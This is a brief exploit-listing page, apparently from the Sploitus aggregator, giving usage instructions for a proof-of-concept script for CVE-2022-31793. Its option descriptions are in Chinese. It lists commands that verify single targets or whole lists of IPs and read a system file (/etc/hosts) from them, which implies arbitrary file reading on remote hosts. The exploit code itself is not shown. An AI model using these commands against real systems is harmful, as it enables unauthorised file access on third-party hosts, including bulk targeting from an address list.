Share
## https://sploitus.com/exploit?id=0F52C261-6C3D-5C39-A914-E0261ACF76DF
# CVE-2022-31793

-u 指定IP  -l 指定ip文件 -v 验证模式 -f 指定读取文件

python poc.py -u ip -v

python poc.py -l url.txt -v

python poc.py -u ip -f /etc/hosts

python poc.py -l url.txt -f /etc/hosts